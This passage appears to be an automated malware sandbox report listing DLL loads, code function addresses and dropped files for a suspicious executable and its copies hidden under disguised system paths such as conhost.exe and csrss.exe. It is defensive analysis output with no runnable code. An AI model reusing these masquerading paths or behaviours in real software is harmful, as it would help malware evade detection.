Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 38_2_00007FF848F316EF
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 39_2_00007FF848F2FD62
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 39_2_00007FF848F70B1C
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 39_2_00007FF848F66000
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 39_2_00007FF8490E5BDF
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 39_2_00007FF8490DEEA8
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 39_2_00007FF8490DFFF8
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 39_2_00007FF8490DFFFA
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\bveMYDWO.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: bveMYDWO.log.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vnUJHstD.log.39.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: KtMg6d1Ivx.exe, 00000000.00000000.1988230334.0000000000C44000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KtMg6d1Ivx.exe
Source: KtMg6d1Ivx.exe | Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KtMg6d1Ivx.exe
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                    Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: logoncli.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: ntdsapi.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: version.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: amsi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: version.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: amsi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: mscoree.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: apphelp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: version.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: wldp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: mscoree.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: version.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: wldp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: mscoree.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: apphelp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: version.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: wldp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: mscoree.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: version.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: wldp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: mscoree.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: kernel.appcore.dll
